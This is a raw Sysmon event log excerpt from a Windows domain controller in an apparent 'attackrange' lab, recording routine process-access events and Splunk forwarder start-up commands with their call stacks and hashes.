10:40:11.760{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001882Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.760{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001881Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.760{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001880Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.760{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001879Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.760{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001878Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.760{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001877Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.760{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001876Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.760{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001875Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.760{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E0B-5F80-4C00-000000007F01}3840C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001874Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.760{733EE690-3E0B-5F80-4B00-000000007F01}38523848C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{733EE690-3E0B-5F80-4C00-000000007F01}3840C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001873Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.764{733EE690-3E0B-5F80-4C00-000000007F01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{733EE690-3E0B-5F80-4B00-000000007F01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001872Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0B-5F80-4B00-000000007F01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001871Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001870Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001869Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001868Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001867Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001866Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001865Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001864Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001863Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001862Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0B-5F80-4B00-000000007F01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001861Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3E0B-5F80-4A00-000000007F01}38363832C:\Windows\system32\cmd.exe{733EE690-3E0B-5F80-4B00-000000007F01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001860Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.754{733EE690-3E0B-5F80-4B00-000000007F01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{733EE690-3E0B-5F80-4A00-000000007F01}3836C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000001859Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0B-5F80-4A00-000000007F01}3836C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001858Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001857Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.744{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001856Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 